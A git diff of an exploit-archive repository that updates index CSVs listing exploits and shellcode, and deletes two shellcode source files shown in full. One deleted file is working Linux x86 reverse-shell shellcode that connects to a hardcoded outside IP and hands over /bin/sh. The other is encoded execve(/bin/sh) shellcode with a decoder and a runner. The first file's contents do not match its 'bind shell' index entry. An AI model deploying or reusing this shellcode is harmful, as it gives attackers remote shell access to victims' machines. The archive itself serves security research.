 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11198,7 +11199,6 @@ id,file,description,date,author,type,platform,port
 48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
 48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
-48719,exploits/windows/local/48719.py,"docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
 48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
 48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
 48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
@@ -11228,8 +11228,10 @@ id,file,description,date,author,type,platform,port
 49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
 49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
-49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
+49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
+49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17974,7 +17976,7 @@ id,file,description,date,author,type,platform,port
 44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
 44297,exploits/linux/remote/44297.py,"Unitrends UEB 10.0 - Root Remote Code Execution",2018-03-16,"Jared Arave",remote,linux,
 44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
-44349,exploits/linux/remote/44349.md,"TestLink Open Source Test Management < 1.9.16 - Remote Code Execution (PoC)",2018-03-27,"Manish Tanwar",remote,linux,
+49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,
 44356,exploits/windows/remote/44356.rb,"GitStack - Unsanitized Argument Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44357,exploits/windows/remote/44357.rb,"Exodus Wallet (ElectronJS Framework) - Remote Code Execution (Metasploit)",2018-03-29,Metasploit,remote,windows,
 44376,exploits/windows/remote/44376.py,"Advantech WebAccess < 8.1 - webvrpcs DrawSrv.dll Path BwBuildPath Stack-Based Buffer Overflow",2018-03-30,"Chris Lyne",remote,windows,4592
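Review bot: The added row 49293 takes the slot of the removed row 44349, between 44345 and 44356, which breaks the ascending id order the surrounding remote rows follow. Rows 49291 and 49292 in the hunk at `@@ -41216,6 +41219,8 @@` are placed between 44343 and 44350 in the same way. The hunk at `@@ -18339,6 +18341,7 @@` puts 49261 at the end of the remote section, so 49293 would sit more consistently after that row. Whether `exploits/linux/remote/44349.md` is deleted in this commit is not visible from here; if the file stays, it can no longer be found through the index, which is worth confirming.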
@@ -18339,6 +18341,7 @@ id,file,description,date,author,type,platform,port
 49216,exploits/windows/remote/49216.py,"SmarterMail Build 6985 - Remote Code Execution",2020-12-09,1F98D,remote,windows,
 49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
 49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
+49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40314,7 +40317,7 @@ id,file,description,date,author,type,platform,port
 42090,exploits/multiple/webapps/42090.txt,"KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution",2017-05-30,SecuriTeam,webapps,multiple,
 42091,exploits/windows/webapps/42091.txt,"IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow",2017-05-30,SecuriTeam,webapps,windows,
 41849,exploits/php/webapps/41849.txt,"Jobscript4Web 4.5 - Authentication Bypass",2017-04-08,TurkCyberArmy,webapps,php,
-41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Thomas Sluyter",webapps,xml,8400
+41855,exploits/xml/webapps/41855.sh,"Adobe (Multiple Products) - XML Injection File Content Disclosure",2017-04-07,"Tess Sluyter",webapps,xml,8400
 41856,exploits/php/webapps/41856.txt,"MyClassifiedScript 5.1 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41858,exploits/php/webapps/41858.txt,"Social Directory Script 2.0 - SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
 41859,exploits/php/webapps/41859.txt,"FAQ Script 3.1.3 - 'category_id' SQL Injection",2017-04-11,"Ihsan Sencan",webapps,php,
@@ -41216,6 +41219,8 @@ id,file,description,date,author,type,platform,port
 44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php,
 44340,exploits/php/webapps/44340.txt,"WordPress Plugin Site Editor 1.1.1 - Local File Inclusion",2018-03-23,"Nicolas Buzy-Debat",webapps,php,80
 44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,
+49291,exploits/windows/webapps/49291.py,"SyncBreeze 10.0.28 - 'login' Denial of Service (Poc)",2020-12-18,"Ahmed Elkhressy",webapps,windows,
+49292,exploits/php/webapps/49292.txt,"Xeroneit Library Management System 3.1 - _Add Book Category _ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
 44350,exploits/multiple/webapps/44350.py,"TwonkyMedia Server 7.0.11-8.5 - Directory Traversal",2018-03-28,"Sven Fassbender",webapps,multiple,
 44351,exploits/multiple/webapps/44351.txt,"TwonkyMedia Server 7.0.11-8.5 - Persistent Cross-Site Scripting",2018-03-28,"Sven Fassbender",webapps,multiple,
 44352,exploits/windows/webapps/44352.txt,"Microsoft Windows Remote Assistance - XML External Entity Injection",2018-03-28,"Nabeel Ahmed",webapps,windows,
@@ -43463,3 +43468,44 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
+49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
+49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
+49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
+49267,exploits/php/webapps/49267.txt,"PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection",2020-12-16,"Frederic ADAM",webapps,php,
+49268,exploits/php/webapps/49268.txt,"Seotoaster 3.2.0 - Stored XSS on Edit page properties",2020-12-16,"Hardik Solanki",webapps,php,
+49269,exploits/php/webapps/49269.py,"Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)",2020-12-17,"Yilmaz Degirmenci",webapps,php,
+49270,exploits/hardware/webapps/49270.py,"Linksys RE6500 1.0.11.001 - Unauthenticated RCE",2020-12-17,RE-Solver,webapps,hardware,
+49271,exploits/php/webapps/49271.txt,"Content Management System 1.0 - 'First Name' Stored XSS",2020-12-17,Zhaiyi,webapps,php,
+49272,exploits/php/webapps/49272.txt,"Content Management System 1.0 - 'email' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49273,exploits/php/webapps/49273.txt,"Content Management System 1.0 - 'id' SQL Injection",2020-12-17,Zhaiyi,webapps,php,
+49274,exploits/php/webapps/49274.txt,"Medical Center Portal Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49275,exploits/php/webapps/49275.txt,"Customer Support System 1.0 - _First Name_ & _Last Name_ Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49277,exploits/php/webapps/49277.txt,"Online Tours & Travels Management System 1.0 - _id_ SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49278,exploits/php/webapps/49278.txt,"Interview Management System 1.0 - Stored XSS in Add New Question",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49279,exploits/php/webapps/49279.txt,"Interview Management System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49280,exploits/php/webapps/49280.txt,"Employee Record System 1.0 - Multiple Stored XSS",2020-12-17,"Saeed Bala Ahmed",webapps,php,
+49281,exploits/php/webapps/49281.txt,"PHPJabbers Appointment Scheduler 2.3 - Reflected XSS (Cross-Site Scripting)",2020-12-17,"Andrea Intilangelo",webapps,php,
+49282,exploits/php/webapps/49282.txt,"Victor CMS 1.0 - Multiple SQL Injection (Authenticated)",2020-12-17,"Furkan Göksel",webapps,php,
+49284,exploits/php/webapps/49284.txt,"Point of Sale System 1.0 - Authentication Bypass",2020-12-18,"Saeed Bala Ahmed",webapps,php,
+49285,exploits/php/webapps/49285.txt,"Alumni Management System 1.0 - Unrestricted File Upload To RCE",2020-12-18,"Aakash Madaan",webapps,php,
+49286,exploits/php/webapps/49286.txt,"Alumni Management System 1.0 - _Course Form_ Stored XSS",2020-12-18,"Aakash Madaan",webapps,php,
+49287,exploits/php/webapps/49287.txt,"Alumni Management System 1.0 - 'id' SQL Injection",2020-12-18,"Aakash Madaan",webapps,php,
+49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,
+49290,exploits/php/webapps/49290.txt,"Smart Hospital 3.1 - _Add Patient_ Stored XSS",2020-12-18,"Kislay Kumar",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 8eaee23cf..f3c018488 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -670,7 +670,6 @@ id,file,description,date,author,type,platform
 43672,shellcodes/generator/43672.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes) (Generator)",2009-01-01,"Russell Sanford",shellcode,generator
 43673,shellcodes/linux_x86/43673.c,"Linux/x86 - setresuid(0_0_0) + execve(/bin/sh) + exit() Shellcode (41 bytes)",2009-01-01,sacrine,shellcode,linux_x86
 43674,shellcodes/linux_x86/43674.c,"Linux/x86 - Reverse (www.netric.org:45295/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2009-01-01,eSDee,shellcode,linux_x86
-43675,shellcodes/linux_x86/43675.c,"Linux/x86 - Bind (45295/TCP) Shell (/bin/sh) + fork() Shellcode (200 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43677,shellcodes/linux_x86/43677.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes)",2009-01-01,eSDee,shellcode,linux_x86
 43679,shellcodes/linux_x86/43679.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (29 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
 43680,shellcodes/linux_x86/43680.c,"Linux/x86 - setuid(0) + execve(/bin/sh_ 0_ 0) Shellcode (27 bytes)",2009-01-01,"Marcin Ulikowski",shellcode,linux_x86
@@ -950,7 +949,6 @@ id,file,description,date,author,type,platform
 46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
 46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
-46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
diff --git a/shellcodes/linux_x86/43675.c b/shellcodes/linux_x86/43675.c
deleted file mode 100644
index d044afcc1..000000000
--- a/shellcodes/linux_x86/43675.c
+++ /dev/null
@@ -1,154 +0,0 @@
-/* linux x86 shellcode by eSDee of Netric (www.netric.org)
- * 131 byte - connect back shellcode (port=0xb0ef)
- */     
-
-#include <stdio.h>
-
-char
-shellcode[] = 
-        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1"
-        "\x06\x51\xb1\x01\x51\xb1\x02\x51"
-        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80"
-        "\x89\xc2\x31\xc0\x31\xc9\x51\x51"
-        "\x68\x41\x42\x43\x44\x66\x68\xb0"
-        "\xef\xb1\x02\x66\x51\x89\xe7\xb3"
-        "\x10\x53\x57\x52\x89\xe1\xb3\x03"
-        "\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
-        "\x74\x06\x31\xc0\xb0\x01\xcd\x80"
-        "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
-        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01"
-        "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
-        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2"
-        "\x50\x68\x6e\x2f\x73\x68\x68\x2f"
-        "\x2f\x62\x69\x89\xe3\x50\x53\x89"
-        "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
-        "\x01\xcd\x80";
-
-int
-c_code()
-{
-        char *argv[2];
-        char *sockaddr = "\x02\x00"             //  Address family
-                         "\xef\xb0"             //  port
-                         "\x00\x00\x00\x00"     //  sin_addr
-                         "\x00\x00\x00\x00"
-                         "\x00\x00\x00\x00";
-
-        int sock;
-
-        sock = socket(2, 1, 6);
-        if (connect(sock, sockaddr, 16) < 0) exit();
-
-        dup2(sock, 0);
-        dup2(sock, 1);
-        dup2(sock, 2);
-
-        argv[0] = "//bin/sh";
-        argv[1] = NULL;
-
-        execve(argv[0], &argv[0], NULL);
-        exit();
-}
-
-int
-asm_code()
-{
-        __asm(" # sock = socket(2, 1, 6);
-                xorl    %eax,   %eax
-                xorl    %ebx,   %ebx
-                xorl    %ecx,   %ecx
-                pushl   %ecx
-                movb    $6,     %cl             # IPPROTO_TCP
-                pushl   %ecx
-                movb    $1,     %cl             # SOCK_STREAM
-                pushl   %ecx
-                movb    $2,     %cl             # AF_INET
-                pushl   %ecx
-                movl    %esp,   %ecx
-                movb    $1,     %bl             # SYS_SOCKET
-                movb    $102,   %al             # SYS_socketcall
-                int     $0x80
-
-                # connect(sock, sockaddr, 16)
-                movl    %eax,   %edx
-                xorl    %eax,   %eax
-                xorl    %ecx,   %ecx
-                pushl   %ecx
-                pushl   %ecx
-                pushl   $0x44434241             # ip address
-                pushw   $0xefb0                 # port
-                movb    $0x02,  %cl             # address family
-                pushw   %cx
-                movl    %esp,   %edi
-                movb    $16,    %bl             # sizeof(sockaddr)
-                pushl   %ebx
-                pushl   %edi
-                pushl   %edx                    # sock
-                movl    %esp,   %ecx
-                movb    $3,     %bl             # SYS_CONNECT
-                movb    $102,   %al             # SYS_socketcall
-                int     $0x80           
-                xorl    %ecx,   %ecx
-                cmpl    %eax,   %ecx
-                je CONNECTED
-
-                # exit()
-                xorl    %eax,   %eax
-                movb    $1,     %al             # SYS_exit
-                int     $0x80
-
-                CONNECTED:
-                # dup2(sock, 0);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                int     $0x80
-
-                # dup2(sock, 1);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                movb    $1,     %cl             # stdout
-                int     $0x80
-
-                # dup2(sock, 2);
-                xorl    %eax,   %eax
-                movb    $63,    %al             # SYS_dup2
-                movl    %edx,   %ebx            # sock
-                movb    $2,     %cl             # stderr
-                int     $0x80
-
-                # execve(argv[0], &argv[0], NULL);
-                xorl    %eax,   %eax
-                xorl    %edx,   %edx
-                pushl   %eax
-                pushl   $0x68732f6e             # the string
-                pushl   $0x69622f2f             # //bin/sh
-                movl    %esp,   %ebx
-                pushl   %eax
-                pushl   %ebx
-                movl    %esp,   %ecx
-                movb    $11,    %al             # SYS_execve
-                int     $0x80
-
-                # exit()
-                xorl    %eax,   %eax
-                movb    $1,     %al             # SYS_exit
-                int     $0x80
-                ");
-}
-
-int
-main()
-{
-        void (*funct)();
-
-        shellcode[33] = 81;     /* ip of www.netric.org :) */
-        shellcode[34] = 17;
-        shellcode[35] = 46;
-        shellcode[36] = 156;
-
-        (long) funct = &shellcode; 
-        funct();        
-        return 0;
-}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/46523.py b/shellcodes/linux_x86/46523.py
deleted file mode 100755
index 7e3920a8c..000000000
--- a/shellcodes/linux_x86/46523.py
+++ /dev/null
@@ -1,99 +0,0 @@
-/*
-; Date: 02/03/2019
-; NOT-Encoder.py
-; Author: Daniele Votta
-; Description: This program encode shellcode with NOT technique.
-; Tested on: i686 GNU/Linux
-; Shellcode Length:25
-
-#!/usr/bin/python
-# Python NOT Encoder
-
-# Execve /bin/sh
-shellcode =("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
-
-encoded = ""
-encoded2 = ""
-
-print 'Encoded shellcode...'
-
-for x in bytearray(shellcode):
-	# NOT Encoding
-	y = ~x
-	encoded += '\\x'
-	encoded += '%02x' % (y & 0xff)
-
-	encoded2 += '0x'
-	encoded2 += '%02x,' % (y & 0xff)
-
-print encoded +"\n"
-print encoded2
-print 'Len: %d' % len(bytearray(shellcode))
-*/
-
-#include<stdio.h>
-#include<string.h>
-
-/*
-
-; NOT-Decoder.asm
-; Author: Daniele Votta
-; Description: This program decode shellcode with NOT technique.
-; Tested on: i686 GNU/Linux
-; Shellcode Length:44
-; JMP | CALL | POP | Techniques
-
-NOT-Decoder:     file format elf32-i386
-
-Disassembly of section .text:
-
-08048080 <_start>:
- 8048080:	eb 0c                	jmp    804808e <call_decoder>
-
-08048082 <decoder>:
- 8048082:	5e                   	pop    esi
- 8048083:	31 c9                	xor    ecx,ecx
- 8048085:	b1 19                	mov    cl,0x19
-
-08048087 <decode>:
- 8048087:	f6 16                	not    BYTE PTR [esi]
- 8048089:	46                   	inc    esi
- 804808a:	e2 fb                	loop   8048087 <decode>
- 804808c:	eb 05                	jmp    8048093 <EncodedShellcode>
-
-0804808e <call_decoder>:
- 804808e:	e8 ef ff ff ff       	call   8048082 <decoder>
-
-08048093 <EncodedShellcode>:
- 8048093:	ce                   	into   
- 8048094:	3f                   	aas    
- 8048095:	af                   	scas   eax,DWORD PTR es:[edi]
- 8048096:	97                   	xchg   edi,eax
- 8048097:	d0 d0                	rcl    al,1
- 8048099:	8c 97 97 d0 9d 96    	mov    WORD PTR [edi-0x69622f69],ss
- 804809f:	91                   	xchg   ecx,eax
- 80480a0:	76 1c                	jbe    80480be <__bss_start+0x12>
- 80480a2:	af                   	scas   eax,DWORD PTR es:[edi]
- 80480a3:	76 1d                	jbe    80480c2 <__bss_start+0x16>
- 80480a5:	ac                   	lods   al,BYTE PTR ds:[esi]
- 80480a6:	76 1e                	jbe    80480c6 <__bss_start+0x1a>
- 80480a8:	4f                   	dec    edi
- 80480a9:	f4                   	hlt    
- 80480aa:	32                   	.byte 0x32
- 80480ab:	7f                   	.byte 0x7f
-[+] Extract Shellcode ... 
-"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
-
-======================= POC Daniele Votta =======================
-*/
-
-/* NOT Encoded Execve /bin/sh */
-unsigned char code[] = \
-"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
-
-int main()
-{
-	printf("Shellcode Length:  %d\n", strlen(code));
-	int (*ret)() = (int(*)())code;
-	ret();
-}
\ No newline at end of file